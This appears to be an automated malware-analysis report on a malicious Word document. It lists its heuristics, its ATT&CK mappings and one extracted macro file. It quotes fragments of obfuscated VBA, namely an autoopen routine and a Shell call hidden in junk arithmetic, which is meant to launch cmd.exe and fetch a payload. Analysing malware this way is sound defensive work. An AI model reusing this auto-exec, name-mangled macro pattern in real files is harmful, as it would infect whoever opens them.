Verdict: MALICIOUS
Risk Score: 252

Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains a legacy WordBasic auto-exec macro ('autoopen') that triggers a critical VBA Shell() call. This call invokes cmd.exe with a highly obfuscated command line, indicating an attempt to download and execute a secondary payload. The complexity and obfuscation suggest a deliberate effort to evade detection.
Heuristics (9)

- ClamAV: Doc.Malware.Generic-6775170-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Generic-6775170-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code.
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: `jWiuub = Array(DLiXGRbB, mEiRv, zbEWPVS, Interaction _ .Shell(hXhVhpKzMt, UUWEkHk), azEPSAcYn) iKltSrruiwiEJMrQ = 90492063 * CInt(212885405) + CALdnucPmXiiIcaLUusv + CLng(221203729 + Sgn(qFAUbUYqsZOjCJWjzwqc) - 34612878 * 152397626) - QZcjBWWUlwZKGcSTHqvfETbZ + Chr(oowuFEXTGkuwlWUVF) * 197021452 / CStr(241601944) / (zQDiijlJruwwCSMiZafr / 12837042 / AsXUVUbKzpqzQYkRQVTNbLn / Fix(vTKmvfztaIQLGJNRihvHHFBo + Hex(IJKXoPoFbZCJpOUrzWIHZLGI) + 10314825 + CBool(205901129 + QjoqRWonVnVmtbGfkLHtSaQ)))`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Attribute VB_Customizable = True Sub autoopen() kFmAWCjjE`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6512 bytes |

SHA-256: 169ee4fbc13b8bc2eb367f02a841c94beb00dd0752a74d960f21f909683f1de2

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 161 of 187 identifiers look randomly generated (e.g. 'HpSQKvqMbKXImBkmUdJzHzfw'), consistent with name-mangling obfuscation.

Preview script: first 1,000 lines of the extracted script.